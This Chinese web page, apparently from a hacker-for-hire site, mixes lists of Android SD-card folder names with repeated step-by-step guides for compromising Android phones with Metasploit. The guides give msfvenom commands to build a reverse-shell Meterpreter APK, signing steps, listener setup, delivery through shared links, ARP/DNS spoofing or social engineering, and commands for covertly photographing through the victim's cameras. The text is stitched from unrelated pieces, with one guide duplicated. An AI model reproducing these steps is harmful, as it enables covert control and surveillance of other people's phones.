黑客24小时在线接单网站

黑客24小时在线接单网站,黑客接单,接单网站,黑客入口

msf入侵安卓(msf攻击手机)

本文目录一览:

手机:msf文件

msf 手机QQ产生的的一个文件夹。

1、Android 比较重要的文件夹,里面是一些程序数据,比如google map的地图缓存。

2、AndroidOptimizer 安装“安卓优化大师”后生成的文件夹

3、AndroidSDLPAL 解压AndroidSDLPAL_95.zip,得到AndroidSDLPAL文件夹

4、babyplan_caches 宝贝全计划缓存文件

5、baidu 顾名思义,掌上百度、百度输入法之类程序的缓存文件夹。

6、BaiduMap 百度地图文件夹"

7、BcgmDict"

8、Beats 跳舞机之类的游戏

9、boyaa_texas_v2 得克萨斯扑克游戏

10、cache

11、camera3601

12、chinapay

13、DCIM 相机的缓存文件夹。

14、documents Documents To Go 的相关文件夹。

15、DomobInterstitial 是水果忍者里面弹出广告和一些照片

16、download 下载文件夹

17、downloaded_rom 系统更新文件夹

18、droidhen 用手机当电脑摄象头软件的文件夹

19、DX-Theme 点心桌面软件文件夹

20、ea EA出品的游戏(我的是极品飞车)

21、gameloft gameloft/games文件夹是存放游戏数据的。Gameloft的大型游戏都有几十MB到上百MB的游戏数据与主程序分开存放。你安装完相应的游戏后,可以打开wifi再运行游戏,会自动下载游戏数据资料到这个文件夹;或者也可以不开wifi,从网上下载相应的游戏数据包解压后放到gameloft/games文件夹下面。

22、gfan 机锋论坛

23、Go NoteWidget 透明便签软件的文档记录

24、GOLauncherEX GO桌面的缓存文件夹,想换字体的话,字体文件放在这个文件夹的fonts目录下。

25、GoStore GO桌面留下的文件夹!

26、果合移动广告,是个广告软件的文件夹!一般可能是缓存的软件在里面,如果他自动生成的话就可能不好删除了!

27、iReader 顾名思义,ireader的缓存文件夹。

28、LiveBeautyle 腿模

29、LOST.DIR 卡上丢失或出错的文件会跑这里,此目录无用,删了会自动生成。

30、miliao 顾名思义,米聊的缓存文件夹。

31、MIUI 顾名思义,MIUI的缓存文件夹。

32、mosecurity 这个应该是金山卫士的文件夹!

33、Movies 顾名思义,电影的缓存文件夹。

34、msf 手机QQ产生的

35、muzhiwan 顾名思义,拇指玩的缓存文件夹。

36、NceEnglish 新概念英译缓存文件夹

37、Notifications 在SD卡任意位置建立名为“notifications”的文件夹,把自己的铃音扔进去 指手机内存(网上查的,我没太看懂)

38、openfeint 顾名思义,openfeint的缓存文件夹 (OpenFeint是一个基于SNS的平台,为iOS和andriod系统提供在线游戏竞技的技术平台)

39、p2pcache 手机快播视频缓存文件夹,(目前快播安卓版使用小文件策略,所以下载完也还是!mv文件,关于下载完合成完整视频的需求已经提交给开发人员评估是否在后续本优化改进)

40、persist_images 一款拍照软件图片存放文件夹

41、Pictures 截屏图片存放处(查了下我的手机是这样)

42、Podcasts 播客文件夹(网络解释),删了不影响!

43、QDReader 起点读书缓存文件夹

44、QuickPai 顾名思义,QuickPai的缓存文件夹条(我的是二维条码扫描器软件)。

45、qvod 顾名思义,qvod的缓存文件夹

46、ringtones 网上下载铃声存放文件夹

47、RMS 这是一个你进入木马清理或者系统优化时的临时备份文件

48、ROMs 模拟器文件夹

49、sgsupdate 是三国杀的升级文件安装包

50、snda 盛大网络公司出的游戏,如果你卸载了产品这个也可以删掉。

51、spbshell_log SPB主题日志

52、svox一款中文语音插件,可以支持多种语言阅读,第三方语音识别软件

53、TalkingFriends 会说话的tom猫录制的视频文件所保存的目录。

54、Tencent ,腾讯软件的缓存目录。

55、tmpcache 酷我音乐下载时缓存文件夹

56、ttpod ttpod是天天动听的安装目录,里面会有一些文件夹都是相关功能的目录,一般会有:data—系统目录,skin—皮肤目录,lyrics—歌词目录,log—日志文件目录(有关天天动听运行的一些记录,如果运行有问题,log.txt这个文件可以很直观的看出是哪一个环节出了问题。)

57、UCDownloads UCweb浏览器下载文件缓存的保存目录。

58、UCMobileConfig UC浏览器中的配置文件

59、youmicache 这是一个广告联盟的广告缓存文件,(你用的其他软件有挂这个联盟的广告就会有这个文件夹,要彻底删掉就要删除那些带这个联盟广告的软件 )

另一种分析方法

1、.android_secure 是官方app2sd的产物,删了之后装到sd卡中的软件就无法使用了,小心别误删。

2、.Bluetooth 用蓝牙之后就会有这个。0 c+ y- J, _# I1 b$ J

3、.mobo Moboplayer的缓存文件。

4、.QQ QQ的缓存文件,定期清除。

5、.quickoffice 顾名思义,quickoffice的缓存文件。

6、.switchpro 顾名思义,switchprowidget(多键开关)的缓存文件。

7、.ucdlres UC迅雷的缓存文件。

8、albumart 音乐专辑封面的缓存文件夹。

9、albums 相册缩略图的缓存文件夹。

10、Android 比较重要的文件夹,里面是一些程序数据,比如google map的地图缓存,误删掉后地图还需重新下载。

11、backups 一些备份文件,比如联系人导出到SD卡时会导入到此文件夹。

12、baidu 顾名思义,掌上百度、百度输入法之类程序的缓存文件夹。

13、bugtogo 系统出现问题的时候会形成一些报告文件,存放于此文件夹。

14、cmp 个人判断是音乐的缓存文件夹。

15、data 同样是缓存数据的文件夹,与Android性质类似。

16、DCIM 相机的随机缓存文件夹,一些功能设置参数的记录 ,及时整理清除。

17、documents Documents To Go 的相关文件夹。

18、etouch 易行的缓存文件夹。

19、extracted androzip等解压缩软件默认的解压目录。

20、gameloft gameloft游戏数据包存放的文件夹。

21、handcent 顾名思义handcent(超级短信)数据文件夹。

22、handyCurrency 货币汇率相关的文件夹,装了handycalc(科学计算器)之后才会有。

23、ireader 顾名思义,ireader的缓存文件夹。

24、KingReader 开卷有益的缓存文件夹。

25、LazyList Applanet(黑市场)的缓存目录,也许和其他程序也有关,暂时不太清楚,慎重使用。

26、LOST.DIR 卡上丢失或出错的文件会跑这里,此目录无用,删了会自动生成。

27、moji 顾名思义,墨迹天气的缓存目录。

28、MusicFolders poweramp产生的缓存文件夹。

29、openfeint 顾名思义,openfeint的缓存文件夹。

30、Picstore 图片浏览软件建立的一个目录。

31、Playlists 播放列表的缓存文件夹。

32、renren 顾名思义,人人网客户端的缓存文件夹。

33、screenshot 貌似是截屏图片保存的目录,不过我不记得自己装过screenshot这个软件,或许不好用删了。

34、ShootMe 顾名思义 shootme截屏后图片文件保存的目录。

35、SmartpixGames Smartpix Games出品游戏的缓存文件夹,比如Jewellust。

36、sogou 顾名思义,搜狗拼音输入法的随机缓存文件夹)

37、SpeedSoftware RE文件管理器的缓存文件夹。

38、SystemAppBackup SystemApp remove (深度卸载)备份系统文件后,备份文件保存的目录。

39、TalkingFriends talking tom(会说话的tom猫)录制的视频文件所保存的目录。

40、Tencent 顾名思义,腾讯软件的缓存目录,比如QQ。(与上面的.QQ文件夹并不相同)

41、TitaniumBackup 钛备份备份的程序所保存的目录。

42、TunnyBrowser 感觉是海豚浏览器的缓存目录,但为什么叫这个名字?,金枪鱼浏览器.....

43、UCDLFiles UC迅雷下载文件的保存目录。

44、UCDownloads UCweb浏览器下载文件缓存的保存目录。

45、VIE Vignette (晕影相机)的缓存目录。

46、V"PN 顾名思义,V|PN数据的缓存目录。(“|”为了反和谐)

47、yd_historys 有道词典搜索历史的缓存目录

48、yd_speech 有道词典单词发音的缓存目录。

49、youmicache 删掉后还会自动生成,悠米广告的缓存目录,广告程序内嵌在其程序中,没用别装有米。

50、Glu Glu系列游戏的资料包存放地,如3D猎鹿人,勇猛二兄弟等。

51、apadqq-images QQ for pad 的缓存目录。

52、DunDef 地牢守护者的数据包。

53、KuwoMusic 顾名思义,酷我音乐的相关文件夹。

54、MxBrowser 遨游的缓存目录。

55、Camera360 相机camera360的随机缓存目录,可以定期清除。

56、TTPod 顾名思义,天天动听的缓存目录。

57. My documents 自己手机启用各种程序任务记录文档 定期清除 时间长了会积累很多 占用SD卡内存。

58. .nomedia 手机中隐藏的音频 图片文件夹 可以自设在相关文件夹中。

59. media(媒体文档) 使用电话通话录音 或在线浏览视频等媒体 产生的音频文件 记录存档的目录 。

如何使用Metasploit对安卓手机进行控制

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

这是我们切换到安卓模拟器。

如何使用metasploit对安卓手机进行控制

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像,启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali,我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

msf怎么远程监控安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

安卓手机里的msf、LOST.DIR是什么??

msf 手机QQ产生的,这个直接删除,QQ2012乱七八糟的日志呀调试什么的记录文件,不过删掉之后还是会自动生成的

LOST.DIR是专门收集Android系统运行时意外丢失的文件而设置的文件夹,其收集的内容包括系统因为意外而没能保存的各类 内存 、交换、暂存等数据, 软件 的缓存数据、以及其他各类文件。只要系统发生意外(如软件突然无法正常运行),便会将发生意外的文件移到此目录下,以数字序列名称代替该文件的扩展名。注意:由于LOST.DIR文件夹的特殊作用,里面的文件都是“意外而生”,因此可以删除里面的文件,但请不要删除LOST.DIR文件夹

都是可以删掉的 我一看到他积压过多就会删

  • 评论列表:
  •  孤央鹿鸢
     发布于 2022-07-03 20:41:27  回复该评论
  • PK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具输入命令:msfconsole然后输入:1. use exploit/multi/handler 加载模块2. set payload android/meterpreter/reverse_t
  •  辞眸揽月
     发布于 2022-07-04 00:59:21  回复该评论
  • 、DX-Theme 点心桌面软件文件夹20、ea EA出品的游戏(我的是极品飞车)21、gameloft gameloft/games文件夹是存放游戏数据的。Gameloft的大型游戏都有几十MB到上百MB的

发表评论:

«    2024年8月    »
1234
567891011
12131415161718
19202122232425
262728293031
文章归档
标签列表

Powered By

Copyright Your WebSite.Some Rights Reserved.